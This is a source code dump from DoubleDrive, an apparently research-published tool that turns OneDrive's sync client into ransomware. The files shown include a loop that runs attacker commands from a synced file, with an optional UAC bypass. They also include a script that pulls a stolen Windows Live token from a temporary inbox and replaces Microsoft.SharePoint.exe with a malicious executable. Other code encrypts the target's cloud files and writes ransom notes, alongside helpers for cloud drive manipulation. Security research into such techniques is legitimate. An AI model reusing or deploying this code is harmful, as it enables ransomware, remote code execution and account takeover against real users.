get_configs()[ConfigKey.CMD_FILE_NAME.value]) 26 | if os.path.exists(file_name): 27 | original_time = os.path.getmtime(file_name) 28 | else: 29 | original_time = 0 30 | 31 | while(True): 32 | if os.path.exists(file_name) and os.path.getmtime(file_name) > original_time: 33 | with open(file_name, "r") as f: 34 | cmd_json = json.load(f) 35 | original_time = os.path.getmtime(file_name) 36 | command = cmd_json.get("command", None) 37 | if None == command: 38 | 
continue 39 | if cmd_json.get("uac", False): 40 | run_command_with_uac_bypass(command) 41 | else: 42 | os.system(command) 43 | time.sleep(1) 44 | 45 | 46 | if "__main__" == __name__: 47 | main() -------------------------------------------------------------------------------- /onedrive_doubledrive/onedrive_doubledrive.py: -------------------------------------------------------------------------------- 1 | import json 2 | import argparse 3 | import urllib 4 | import requests 5 | import re 6 | 7 | from config import get_configs, ConfigKey 8 | from doubledrive.cloud_ransomware.onedrive_ransomware import OneDriveRansomware 9 | from doubledrive.endpoint_takeover_utils.temp_email import TempEmail 10 | from doubledrive.cloud_drive.onedrive.onedrive import OneDrive 11 | from doubledrive.cloud_drive.onedrive.onedrive_item import OneDriveFileItem 12 | 13 | SHAREPOINT_REPLACEMENT_EXE_NAME = "follow_attacker_commands.exe" 14 | 15 | def save_token_in_cache(drive_id, token): 16 | with open(f"{drive_id}.cache", "w") as f: 17 | return f.write(token) 18 | 19 | 20 | def get_token_from_temp_email(): 21 | temp_email = TempEmail(get_configs()[ConfigKey.TOKEN_DST_EMAIL_ADDRESS.value]) 22 | messages = temp_email.get_messages() 23 | if 0 == len(messages): 24 | raise LookupError("The temp email's inbox is empty. 
Try again in 1-2 minutes") 25 | last_message = messages[0] 26 | re_match = re.search("\"https://1drv.ms.*?\"", last_message.content) 27 | url = re_match.group().replace("\"", "") 28 | html_text= requests.get(url).text 29 | search_url = "\"https\\\\u003a\\\\u002f\\\\u002fonedrive.live.com.*?\"" 30 | re_match = re.search(search_url, html_text) 31 | file_url = re_match.group().replace("\"", "").encode('utf-8').decode('unicode_escape') 32 | file_url_params = urllib.parse.parse_qs(urllib.parse.urlparse(file_url).query) 33 | onedrive_file_auth_key = file_url_params["authkey"][0] 34 | onedrive_file_id = file_url_params["id"][0] 35 | onedrive_file_drive_id = file_url_params["cid"][0] 36 | onedrive_session = OneDrive() 37 | windows_live_token = onedrive_session.read_shared_file_content(onedrive_file_drive_id, onedrive_file_id, onedrive_file_auth_key).decode() 38 | return windows_live_token 39 | 40 | 41 | def login_according_to_args(args, onedrive_session: OneDrive): 42 | if args.use_saved_token: 43 | with open(args.use_saved_token, "r") as f: 44 | token = f.read() 45 | onedrive_session.login_using_token(token) 46 | else: 47 | token = get_token_from_temp_email() 48 | onedrive_session.login_using_token(token) 49 | save_token_in_cache(onedrive_session.get_drive_id(), token) 50 | 51 | 52 | def get_target_onedrive_items(onedrive_session: OneDrive): 53 | all_onedrive_files_to_encrypt = [] 54 | for item in get_configs()[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].keys(): 55 | onedrive_junction_item = onedrive_session.get_item_by_path(f"/{item}") 56 | onedrive_junction_children = onedrive_session.list_children_recursively(onedrive_junction_item) 57 | items_to_encrypt = [item for item in onedrive_junction_children if isinstance(item, OneDriveFileItem)] 58 | all_onedrive_files_to_encrypt.extend(items_to_encrypt) 59 | 60 | return all_onedrive_files_to_encrypt 61 | 62 | 63 | def parse_args(): 64 | parser = argparse.ArgumentParser(description="DoubleDrive - Turns the original 
OneDrive.exe into a ransomware") 65 | parser.add_argument("--remote-ransomware", help="If specified, encrypts all the remote files under the directories that were targeted with options_setup.py", action="store_true") 66 | parser.add_argument("--key-path", default="./key.key", help="Path of the file to save the Fernet encryption/decryption key in, defaults to './key.key'") 67 | parser.add_argument("--ransom-note", default="PAY ME MONEY", help="A note to write in the ransom note, defaults to 'PAY ME MONEY'") 68 | parser.add_argument("--ransom-note-name", default="RANSOM_NOTE.txt", help="name of the ransom note that is created in each target folder, defaults to 'RANSOM_NOTE.txt'") 69 | parser.add_argument("--replace-sharepoint", help="If specified, replaces Microsoft.SharePoint.exe which is part of OneDrive's binaries with an executable that executes attacker's commands", action="store_true") 70 | parser.add_argument("--sharepoint-replacement-exe-path", default=f"./{SHAREPOINT_REPLACEMENT_EXE_NAME}", help=f"The path of the executable that is will be used in case the --replace-sharepoint flag was given. 
Defaults to \"./{SHAREPOINT_REPLACEMENT_EXE_NAME}\"", action="store_true") 71 | 72 | group = parser.add_mutually_exclusive_group(required=False) 73 | group.add_argument("--use-saved-token", help="Path to a file that contains a Windows ID Live token to use") 74 | 75 | parser.add_argument("--run-command", help="A command to pass to the malicious executable that replaces SharePoint's executable on the endpoint") 76 | parser.add_argument("--command-uac-bypass", help="If specified, first bypasses UAC on the target and then runs the command given in --run-command", action="store_true") 77 | args = parser.parse_args() 78 | 79 | return args 80 | 81 | 82 | def main(): 83 | args = parse_args() 84 | configs = get_configs() 85 | onedrive_session = OneDrive() 86 | login_according_to_args(args, onedrive_session) 87 | 88 | if args.replace_sharepoint: 89 | with open(args.sharepoint_replacement_exe_path, "rb") as f: 90 | malicious_exe = f.read() 91 | sharepoint_exe_onedrive_item = onedrive_session.get_item_by_path(f"/{configs[ConfigKey.ONEDRIVE_VERSION_FOLDER_JUNCTION_NAME.value]}/Microsoft.SharePoint.exe") 92 | onedrive_session.modify_file_content(sharepoint_exe_onedrive_item, malicious_exe) 93 | 94 | if args.run_command: 95 | cmd_dict = { 96 | "uac": args.command_uac_bypass, 97 | "command": args.run_command 98 | } 99 | onedrive_session.create_file(f"/{configs[ConfigKey.CMD_FILE_NAME.value]}", json.dumps(cmd_dict).encode(), modify_if_exists=True) 100 | 101 | if args.remote_ransomware: 102 | onedrive_ransomware = OneDriveRansomware(onedrive_session, args.key_path) 103 | all_onedrive_files_to_encrypt = get_target_onedrive_items(onedrive_session) 104 | onedrive_ransomware.start_ransomware(all_onedrive_files_to_encrypt, quick_delete=configs[ConfigKey.QUICK_DELETE.value]) 105 | 106 | # Create ransom notes 107 | for item in get_configs()[ConfigKey.JUNCTION_NAMES_TO_TARGET_PATHS.value].keys(): 108 | onedrive_junction_item = onedrive_session.get_item_by_path(f"/{item}") 109 | 
ransom_note_path = f"{onedrive_junction_item.full_path}/{args.ransom_note_name}" 110 | onedrive_session.create_file(ransom_note_path, args.ransom_note) 111 | 112 | 113 | 114 | 115 | if "__main__" == __name__: 116 | main() -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | construct==2.10.68 2 | cryptography==41.0.3 3 | minidump==0.0.21 4 | psutil==5.9.5 5 | pycryptodome==3.18.0 6 | PyYAML==6.0.1 7 | Requests==2.31.0 8 | setuptools==65.5.0 9 | pywin32==306 10 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup, find_packages 2 | 3 | with open("requirements.txt") as f: 4 | required = f.read().splitlines() 5 | setup( 6 | name="DoubleDrive", 7 | version="1.0", 8 | package_dir={"": "src"}, # Optional 9 | packages=find_packages(where="src"), # Required 10 | install_requires=required) 11 | -------------------------------------------------------------------------------- /src/doubledrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/cloud_drive.py: -------------------------------------------------------------------------------- 1 | import os 2 | from abc import ABC, 
abstractmethod, ABCMeta 3 | from dataclasses import dataclass 4 | 5 | 6 | @dataclass 7 | class CloudDriveItem: 8 | """ 9 | A generic item in a cloud drive service. Can be a file or a directory. 10 | """ 11 | name: str 12 | full_path: str 13 | 14 | def __init__(self, full_path: str) -> None: 15 | self.full_path = full_path 16 | if "/" == full_path: 17 | self.name = "/" 18 | else: 19 | self.name = os.path.basename(full_path) 20 | 21 | @dataclass 22 | class CloudDriveFolderItem(CloudDriveItem): 23 | """ 24 | A folder item in a cloud drive service. 25 | """ 26 | def __init__(self, full_path: str) -> None: 27 | super().__init__(full_path) 28 | 29 | @dataclass 30 | class CloudDriveFileItem(CloudDriveItem): 31 | """ 32 | A file item in a cloud drive service. 33 | """ 34 | def __init__(self, full_path: str) -> None: 35 | super().__init__(full_path) 36 | 37 | 38 | class ICloudDriveSession(ABC): 39 | """ 40 | An interface that represents a session with a cloud drive service. 41 | """ 42 | @abstractmethod 43 | def create_file(self, file_path: str, file_content: bytes, modify_if_exists: bool = False) -> CloudDriveFileItem: 44 | """ 45 | Creates a file in the cloud storage of the service 46 | 47 | :param file_path: The path to create the file in on the cloud storage 48 | :param file_content: The content to write into the new file 49 | :param modify_if_exists: Whether to modify the file if it already exists 50 | If False and a file exists in the given path then exception is raised 51 | 52 | :return: An instance of the created CloudDriveFileItem 53 | """ 54 | pass 55 | 56 | @abstractmethod 57 | def modify_file_content(self, cloud_file_item: CloudDriveFileItem, new_content: bytes): 58 | """ 59 | Modifies a cotent of a file on the cloud storage 60 | 61 | :param cloud_file_item: The file to modify 62 | :param new_content: The new content that will overwrite the previous content of the give file 63 | """ 64 | pass 65 | 66 | @abstractmethod 67 | def read_file_content(self, 
cloud_file_item: CloudDriveFileItem) -> bytes: 68 | """ 69 | Reads the content of a file from the cloud storage 70 | 71 | :param cloud_file_item: The file to read 72 | 73 | :return: The content of the file in bytes 74 | """ 75 | pass 76 | 77 | @abstractmethod 78 | def delete_item(self, cloud_item: CloudDriveItem): 79 | """ 80 | Deletes an iten from the cloud storage 81 | 82 | :param cloud_item: The item to delete on the cloud storage 83 | """ 84 | pass 85 | 86 | @abstractmethod 87 | def list_children(self, cloud_folder_item: CloudDriveFolderItem) -> list[CloudDriveItem]: 88 | """ 89 | Lists all the direct children items of a folder on the cloud storage 90 | 91 | :param cloud_folder_item: The folder to list 92 | 93 | :return: A list of all the found direct children of the given folder 94 | """ 95 | pass 96 | 97 | @abstractmethod 98 | def list_children_recursively(self, cloud_folder_item: CloudDriveFolderItem) -> list[CloudDriveItem]: 99 | """ 100 | Lists all the children items of a folder recursively on the cloud storage 101 | 102 | :param cloud_folder_item: The folder to list 103 | 104 | :return: A list of all the found children of the given folder in any depth 105 | """ 106 | pass 107 | 108 | @abstractmethod 109 | def get_item_by_path(self, item_path: str) -> CloudDriveItem: 110 | """ 111 | Returns the object of an item on the cloud storage by its path 112 | 113 | :param item_path: The path of the requested item 114 | """ 115 | pass 116 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/google_drive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/google_drive.py: 
-------------------------------------------------------------------------------- 1 | import os 2 | import requests 3 | 4 | from doubledrive.cloud_drive.cloud_drive import CloudDriveFolderItem, CloudDriveItem, ICloudDriveSession 5 | from doubledrive.cloud_drive.google_drive.google_drive_item import GoogleDriveItem, GoogleDriveFolderItem, GoogleDriveFileItem 6 | 7 | 8 | class GoogleDrive(ICloudDriveSession): 9 | 10 | def __init__(self) -> None: 11 | self.__http_session = requests.Session() 12 | self.__session_token = None 13 | self.__root_folder_id = None 14 | self.__root_folder_item = None 15 | self.__ids_to_paths_cache = {} 16 | 17 | def __safe_http_request(self, *args, **kwargs) -> requests.Response: 18 | res = self.__http_session.request(*args, **kwargs) 19 | res.raise_for_status() 20 | return res 21 | 22 | def __update_token(self, token): 23 | self.__session_token = token 24 | self.__http_session.headers.update({"authorization": self.__session_token}) 25 | 26 | def __get_item_json_fields(self, item_id): 27 | if item_id == self.__root_folder_id and None != self.__root_folder_item: 28 | return self.__root_folder_item.fields 29 | res = self.__safe_http_request("GET", f"https://www.googleapis.com/drive/v2internal/files/{item_id}") 30 | return res.json() 31 | 32 | def __item_json_to_path(self, google_drive_json_item: dict): 33 | if self.__get_root_folder_id() == google_drive_json_item["id"]: 34 | return "/" 35 | elif 0 == len(google_drive_json_item["parents"]): 36 | return "COMPUTERS:" + google_drive_json_item["title"] 37 | elif google_drive_json_item["id"] in self.__ids_to_paths_cache.keys(): 38 | return self.__ids_to_paths_cache[google_drive_json_item["id"]] 39 | else: 40 | path = self.__item_json_to_path(self.__get_item_json_fields(google_drive_json_item["parents"][0]["id"])) + "/" + google_drive_json_item["title"] 41 | path = path.replace("//", "/") 42 | self.__ids_to_paths_cache[google_drive_json_item["id"]] = path 43 | return path 44 | 45 | def 
__item_json_to_google_drive_item(self, google_drive_json_item) -> GoogleDriveItem: 46 | item_path = self.__item_json_to_path(google_drive_json_item) 47 | 48 | if google_drive_json_item["mimeType"] == "application/vnd.google-apps.folder": 49 | return GoogleDriveFolderItem(item_path, google_drive_json_item["id"], google_drive_json_item) 50 | else: 51 | return GoogleDriveFileItem(item_path, google_drive_json_item["id"], google_drive_json_item) 52 | 53 | def __query_files(self, string_query: str): 54 | params = { 55 | "q": string_query 56 | } 57 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/files", params=params) 58 | res_json = res.json() 59 | children_google_drive_items = [] 60 | next_page_exists = True 61 | while next_page_exists: 62 | for json_item in res_json["items"]: 63 | children_google_drive_items.append(self.__item_json_to_google_drive_item(json_item)) 64 | 65 | next_page_exists = None != res_json.get("nextLink", None) 66 | 67 | return children_google_drive_items 68 | 69 | def __get_root_folder_id(self) -> str: 70 | if None != self.__root_folder_id: 71 | return self.__root_folder_id 72 | 73 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/about") 74 | res_json = res.json() 75 | self.__root_folder_id = res_json["rootFolderId"] 76 | return self.__root_folder_id 77 | 78 | def login_using_token(self, token: str): 79 | self.__update_token(token) 80 | 81 | def list_children(self, google_drive_folder_item: GoogleDriveFolderItem) -> list[GoogleDriveItem]: 82 | return self.__query_files(f"trashed=false and '{google_drive_folder_item.id}' in parents") 83 | 84 | def create_file(self, file_path: str, file_content: bytes, modify_if_exists: bool = False) -> GoogleDriveFileItem: 85 | res = self.__safe_http_request("GET", "https://www.googleapis.com/drive/v2internal/files/generateIds?maxResults=1") 86 | res_json = res.json() 87 | new_file_id = res_json["ids"][0] 88 | 89 | parent_folder_item = 
self.get_item_by_path(os.path.dirname(file_path)) 90 | new_file_name = os.path.basename(file_path) 91 | params = { 92 | "id": new_file_id, 93 | "title": new_file_name, 94 | "parents": [ 95 | { 96 | "id": parent_folder_item.id 97 | } 98 | ] 99 | } 100 | res = self.__safe_http_request("POST", "https://www.googleapis.com/upload/drive/v2internal/files?uploadType=resumable", json=params) 101 | upload_url = res.headers["Location"] 102 | res = self.__safe_http_request("POST", upload_url, data=file_content) 103 | res_json = res.json() 104 | 105 | # Fixing a bug in GoogleDrive API, a bad downloadUrl is returned after file creation 106 | if "downloadUrl" in res_json.keys(): 107 | res_json["downloadUrl"] = res_json["downloadUrl"].replace("www.googleapis.comhttps:", "www.googleapis.com") 108 | 109 | return self.__item_json_to_google_drive_item(res_json) 110 | 111 | 112 | def modify_file_content(self, google_drive_item: GoogleDriveFileItem, new_content: bytes): 113 | parent_folder_item = self.get_item_by_id(google_drive_item.fields["parents"][0]["id"]) 114 | params = { 115 | "originalFilename": google_drive_item.name, 116 | "parents": [ 117 | { 118 | "id": parent_folder_item.id 119 | } 120 | ] 121 | } 122 | res = self.__safe_http_request("PUT", f"https://www.googleapis.com/upload/drive/v2internal/files/{google_drive_item.id}?uploadType=resumable&convert=false", json=params) 123 | upload_url = res.headers["Location"] 124 | res = self.__safe_http_request("POST", upload_url, data=new_content) 125 | res_json = res.json() 126 | 127 | # Fixing a bug in GoogleDrive API, a bad downloadUrl is returned after file creation 128 | if "downloadUrl" in res_json.keys(): 129 | res_json["downloadUrl"] = res_json["downloadUrl"].replace("www.googleapis.comhttps:", "www.googleapis.com") 130 | 131 | return self.__item_json_to_google_drive_item(res_json) 132 | 133 | def read_file_content(self, google_drive_file_item: GoogleDriveFileItem) -> bytes: 134 | if "downloadUrl" in 
google_drive_file_item.fields.keys(): 135 | return self.__safe_http_request("GET", google_drive_file_item.fields["downloadUrl"]).content 136 | elif "exportLinks" in google_drive_file_item.fields.keys(): 137 | for export_type, export_link in google_drive_file_item.fields["exportLinks"].items(): 138 | if export_type.startswith("application/vnd.openxmlformats"): 139 | return self.__safe_http_request("GET", export_link).content 140 | 141 | raise RuntimeError(f"Could not find a download link for file {google_drive_file_item.full_path}") 142 | 143 | def rename_item(self, google_drive_item: GoogleDriveItem, new_name: str): 144 | params = { 145 | "title": new_name 146 | } 147 | res = self.__safe_http_request("PATCH", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}", json=params) 148 | 149 | def delete_item(self, google_drive_item: GoogleDriveItem): 150 | self.__ids_to_paths_cache.pop(google_drive_item.id) 151 | res = self.__safe_http_request("DELETE", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}") 152 | 153 | def trash_item(self, google_drive_item: GoogleDriveItem) -> GoogleDriveItem: 154 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/trash") 155 | return self.__item_json_to_google_drive_item(res.json()) 156 | 157 | def make_item_public(self, google_drive_item: GoogleDriveItem) -> str: 158 | params = { 159 | "role" : "writer", 160 | "type" : "anyone" 161 | } 162 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/permissions", json=params) 163 | 164 | def send_item_to_email(self, google_drive_item: GoogleDriveItem, email: str, role: str = "write"): 165 | params = { 166 | "value": email, 167 | "role" : "writer", 168 | "type" : "user" 169 | } 170 | res = self.__safe_http_request("POST", f"https://www.googleapis.com/drive/v2internal/files/{google_drive_item.id}/permissions", json=params) 
171 | 172 | def list_children_recursively(self, google_drive_folder_item: GoogleDriveFolderItem) -> list[CloudDriveItem]: 173 | all_children_items = [] 174 | first_level_children = self.list_children(google_drive_folder_item) 175 | 176 | all_children_items.extend(first_level_children) 177 | for google_drive_child_item in first_level_children: 178 | if isinstance(google_drive_child_item, GoogleDriveFolderItem): 179 | all_children_items.extend(self.list_children_recursively(google_drive_child_item)) 180 | 181 | return all_children_items 182 | 183 | def get_item_by_path(self, item_path: str) -> GoogleDriveItem: 184 | if "/" == item_path: 185 | return self.get_root_folder_item() 186 | elif item_path.startswith("COMPUTERS:") and "/" not in item_path: 187 | return self.get_computer_folder_item_by_name(item_path) 188 | else: 189 | google_drive_parent_item = self.get_item_by_path(os.path.dirname(item_path)) 190 | path_parent_children = self.list_children(google_drive_parent_item) 191 | path_basename = os.path.basename(item_path) 192 | for child_item in path_parent_children: 193 | if path_basename == child_item.name: 194 | return child_item 195 | raise RuntimeError("Could not find Google Drive item") 196 | 197 | def get_all_items_by_path(self, item_path: str) -> list[GoogleDriveItem]: 198 | if "/" == item_path: 199 | return self.get_root_folder_item() 200 | else: 201 | found_items = [] 202 | all_google_drive_parent_items = self.get_all_items_by_path(os.path.dirname(item_path)) 203 | for google_drive_parent_item in all_google_drive_parent_items: 204 | path_parent_children = self.list_children(google_drive_parent_item) 205 | path_basename = os.path.basename(item_path) 206 | for child_item in path_parent_children: 207 | if path_basename == child_item.name: 208 | found_items.append[child_item] 209 | 210 | if 0 == len(found_items): 211 | raise RuntimeError("Could not find Google Drive item") 212 | else: 213 | return found_items 214 | 215 | def get_item_by_id(self, id: str) -> 
GoogleDriveItem: 216 | return self.__item_json_to_google_drive_item(self.__get_item_json_fields(id)) 217 | 218 | def get_root_folder_item(self) -> GoogleDriveFolderItem: 219 | if None != self.__root_folder_item: 220 | return self.__root_folder_item 221 | 222 | self.__root_folder_item = self.__item_json_to_google_drive_item(self.__get_item_json_fields(self.__get_root_folder_id())) 223 | return self.__root_folder_item 224 | 225 | def get_computer_folders(self) -> list[GoogleDriveFolderItem]: 226 | return self.__query_files(f"trashed=false and 'machineRoot' in folderFeatures") 227 | 228 | def get_computer_folder_item_by_name(self, name: str) -> GoogleDriveFolderItem: 229 | for computer_folder in self.get_computer_folders(): 230 | if computer_folder.name == name: 231 | return computer_folder 232 | 233 | raise RuntimeError("Could not find the computer folder") 234 | 235 | def empty_trash(self): 236 | res = self.__safe_http_request("DELETE", "https://www.googleapis.com/drive/v2/files/trash") 237 | 238 | 239 | -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/google_drive/google_drive_item.py: -------------------------------------------------------------------------------- 1 | from dataclasses import dataclass 2 | 3 | from doubledrive.cloud_drive.cloud_drive import CloudDriveItem, CloudDriveFolderItem, CloudDriveFileItem 4 | 5 | @dataclass 6 | class GoogleDriveItem(CloudDriveItem): 7 | id: str 8 | 9 | def __init__(self, full_path: str, id: str, fields: dict) -> None: 10 | super().__init__(full_path) 11 | self.id = id 12 | self.fields = fields 13 | 14 | @dataclass 15 | class GoogleDriveFolderItem(GoogleDriveItem, CloudDriveFolderItem): 16 | def __init__(self, full_path: str, id: str, fields: dict) -> None: 17 | GoogleDriveItem.__init__(self, full_path, id, fields) 18 | 19 | @dataclass 20 | class GoogleDriveFileItem(GoogleDriveItem, CloudDriveFileItem): 21 | def __init__(self, full_path: str, id: str, fields: dict) 
-> None: 22 | GoogleDriveItem.__init__(self, full_path, id, fields) -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/cloud_drive/onedrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/cloud_drive/onedrive/onedrive.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import time 4 | from http import HTTPStatus 5 | 6 | from .onedrive_item import OneDriveItem, OneDriveFileItem, OneDriveFolderItem, OneDrivePackageItem 7 | from doubledrive.cloud_drive.cloud_drive import * 8 | 9 | class OneDrive(ICloudDriveSession): 10 | """ 11 | A session with a OneDrive account 12 | """ 13 | 14 | def __init__(self) -> None: 15 | """ 16 | Creates a OneDrive instance 17 | """ 18 | self.__drive_id = None 19 | self.__http_session = requests.Session() 20 | 21 | def __item_json_to_onedrive_item(self, item_json: dict) -> OneDriveItem: 22 | """ 23 | Converts the JSON structure that is usually returned from OneDrive's servers for 24 | Describing an item in the cloud storage to the specific sub-class of OneDriveItem 25 | that it matches to 26 | 27 | :param item_json: The JSON structure that is returned by OneDrive to describe an 28 | item on its storage 29 | 30 | :return: A OneDriveItem that represents the item described in the JSON structure 31 | """ 32 | parent_path = item_json["parentReference"]["path"].replace("/drive/root:", "") 33 | parent_id = item_json["parentReference"]["id"] 34 | item_name = item_json["name"] 35 | item_id = item_json["id"] 36 | item_path = f"{parent_path}/{item_name}" 37 | 38 | if None != item_json.get("file", None): 39 | onedrive_item = 
OneDriveFileItem(item_path, parent_id, item_id) 40 | elif None != item_json.get("folder", None): 41 | onedrive_item = OneDriveFolderItem(item_path, parent_id, item_id) 42 | elif None != item_json.get("package", None): 43 | onedrive_item = OneDrivePackageItem(item_path, parent_id, item_id) 44 | else: 45 | raise RuntimeError("OneDrive element type is unfamiliar") 46 | 47 | return onedrive_item 48 | 49 | def __update_token(self, token): 50 | """ 51 | Updates the token that the session of this object uses when it attempts to send API 52 | requests to OneDrive's servers 53 | 54 | :param token: The new token to use 55 | """ 56 | self.__session_token = token 57 | self.__http_session.headers.update({"Authorization": self.__session_token}) 58 | 59 | def __safe_http_request(self, *args, **kwargs) -> requests.Response: 60 | """ 61 | Sends an http request using the self.__http_session object, retries 62 | up to 4 times if temporary exception occur and finally raises an 63 | exception if the status code is an error. 64 | 65 | Note - This method supports all the arguments of the requests.Session.request() method 66 | :return: The requests.Response option returned from the requests module 67 | """ 68 | retries = 4 69 | for i in range(retries): 70 | try: 71 | res = self.__http_session.request(*args, **kwargs) 72 | except requests.exceptions.ChunkedEncodingError or requests.exceptions.Timeout: 73 | continue 74 | 75 | if HTTPStatus.SERVICE_UNAVAILABLE == res.status_code: 76 | time.sleep(0.5) 77 | else: 78 | break 79 | 80 | res.raise_for_status() 81 | return res 82 | 83 | def __upload_file_content(self, onedrive_file_path: str, file_content: bytes, req_data: dict) -> requests.Response: 84 | """ 85 | Uploads a content of a file to the OneDrive cloud storage. 
86 | 87 | :param onedrive_file_path: The path of the target file for the upload 88 | :param file_content: The content to upload 89 | :param req_data: A dict of OneDrive's upload settings 90 | by now, the parameter that I identified is meant to 91 | tell OneDrive's server whether to fail when a file with this 92 | path exists or to just modify it. Its name is '"@name.conflictBehavior' 93 | and it can be set to 'replace' or 'fail' 94 | :return: The respond from the server 95 | """ 96 | res = self.__safe_http_request("POST", f"https://api.onedrive.com/v1.0/drives/me/items/root:{onedrive_file_path}:/oneDrive.createUploadSession", json=req_data) 97 | res_json = res.json() 98 | upload_url = res_json["uploadUrl"] 99 | 100 | headers = {"Content-Length": str(len(file_content))} 101 | res = self.__safe_http_request("PUT", upload_url, data=file_content, headers=headers) 102 | 103 | return res 104 | 105 | def __delete_item_by_id(self, item_id): 106 | """ 107 | Deletes an item from the cloud storage. 108 | 109 | :param item_id: The ID of the item to delete 110 | """ 111 | res = self.__safe_http_request("DELETE", f"https://api.onedrive.com/v1.0/drives/me/items/{item_id}") 112 | 113 | def login_using_token(self, token: str): 114 | """ 115 | \"Logins\" into a OneDrive account using an access token for it. 116 | 117 | :param token: The token to login with. Should be given with its prefix. For example: \"Bearer ...\" or \"WLID1.1 t=...\" 118 | """ 119 | self.__update_token(token) 120 | 121 | def get_token(self): 122 | """ 123 | Returns the access token used for the authenticating with OneDrive. 124 | """ 125 | return self.__session_token 126 | 127 | def rename_item(self, onedrive_item: OneDriveItem, new_name: str) -> OneDriveItem: 128 | """ 129 | Renames an item in the cloud storage. 
130 | 131 | :param onedrive_item: The OneDrive item to rename 132 | :param new_name: The new name 133 | :return: The new item after it was renamed 134 | """ 135 | params = { 136 | "@name.conflictBehavior":"replace", 137 | "name": new_name, 138 | "select": "*, path" 139 | } 140 | res = self.__safe_http_request("PATCH", f"https://api.onedrive.com/v1.0/drives/me/items/{onedrive_item.id}", json=params) 141 | return self.__item_json_to_onedrive_item(res.json()) 142 | 143 | def cancel_all_onedrive_changes_subscriptions(self): 144 | """ 145 | Cancels all the subscriptions for syncing with the OneDrive account. In other words, 146 | all the OneDrive applications that sync local directories with the OneDrive account will 147 | stop syncing files with the account until they are restarted. 148 | """ 149 | res = self.__safe_http_request("GET", "https://api.onedrive.com/v1.0/drive/root/subscriptions") 150 | for subscription in res.json()["value"]: 151 | subscription_id = subscription["id"] 152 | res = self.__safe_http_request("DELETE", f"https://api.onedrive.com/v1.0/drive/root/subscriptions/{subscription_id}") 153 | 154 | def send_item_to_email(self, onedrive_item: OneDriveItem, email: str): 155 | """ 156 | Shares a OneDrive item with an email. This method can be used for sharing an item with an email 157 | address that does not belong to a Microsoft account. 158 | 159 | :param onedrive_item: The OneDrive item to share. 160 | :param email: The email to share the item with. 
161 | """ 162 | headers = { 163 | "AppId": "1276168582", 164 | "ClientAppId": "1276168582", 165 | "Platform": "Android Emulator", 166 | "Version": "6.74", 167 | "User-Agent": "okhttp/4.9.3", 168 | "Accept": "application/json", 169 | "Accept-Encoding": "gzip", 170 | } 171 | 172 | params = { 173 | "entities":[{"email": email, "linkType":0, "role":2, "type":0}], 174 | "id": onedrive_item.id, 175 | "message": "", 176 | "requireSignIn": False, 177 | "userAction":0 178 | } 179 | res = self.__safe_http_request("POST", "https://skyapi.live.net/API/2/SetPermissions", json=params, headers=headers) 180 | 181 | def get_user_preferences(self): 182 | """ 183 | Returns the user's email preferences. 184 | """ 185 | res = self.__safe_http_request("GET", f"https://api.onedrive.com/v1.0/drive/userPreferences/email") 186 | return res.json() 187 | 188 | def patch_user_preferences(self, new_preferences: dict): 189 | """ 190 | Changes the user's email preferences. Supported settings with example values: 191 | { 192 | ActivitiesDigest: true 193 | DocumentDigestEmail: true 194 | MassDelete: true 195 | PhotoStreamAccessGranted: true 196 | PhotoStreamComment: true 197 | PhotoStreamInviteAccepted: true 198 | PhotoStreamNewPost: true 199 | PhotoStreamReaction: true 200 | PremiumPositioning: true 201 | RansomwareDetection: true 202 | WeekendRecap: false 203 | } 204 | 205 | :param new_preferences: A dict of the new preferences 206 | """ 207 | res = self.__safe_http_request("PATCH", f"https://api.onedrive.com/v1.0/drive/userPreferences/email", json=new_preferences) 208 | 209 | def delete_from_recycle_bin(self, onedrive_item_id_list: list[OneDriveItem]): 210 | """ 211 | Delete specific OneDrive items from the recycle bin. 
